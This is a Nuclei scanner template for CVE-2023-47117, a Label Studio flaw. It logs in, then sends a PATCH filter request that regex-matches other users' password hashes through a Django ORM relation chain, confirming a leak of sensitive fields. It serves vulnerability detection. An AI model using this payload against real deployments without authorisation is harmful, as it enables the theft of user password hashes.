id: CVE-2023-47117

info:
  name: Label Studio - Sensitive Information Exposure
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
  impact: |
    Unauthenticated attackers can leak sensitive user information including passwords character-by-character by exploiting Django ORM filter chains.
  remediation: |
    Upgrade Label Studio to a patched version that addresses the ORM filter vulnerability.
  reference:
    - https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47117
    - https://github.com/elttam/publications
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-47117
    cwe-id: CWE-200
    epss-score: 0.70644
    epss-percentile: 0.98722
    cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: humansignal
    product: label_studio
    shodan-query: http.favicon.hash:-1649949475
  tags: cve,cve2023,label_studio,oss,exposure,authenticated,vuln

variables:
  Task_id: "{{task}}"
  Project_id: "{{project}}"

http:
  - raw:
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /user/login/?next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on

      - |
        PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}

      - |
        GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_4, "completed_at", "file_upload", "annotators")'
          - 'status_code_3==200 && status_code_4==200'
          - 'contains(header_4, "application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: csrf
        group: 1
        regex:
          - 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">'
        internal: true
# digest: 490a004630440220556df6fda2f8419b80c3ad7d008be0c9f4db257f5b61884d8bfe53649341d80a02200ea902a224daff1cfca74f5c1f0176af6eb6582ece48b8a2aabcd75e770dc144:922c64590222798bb761d5b6d8e72950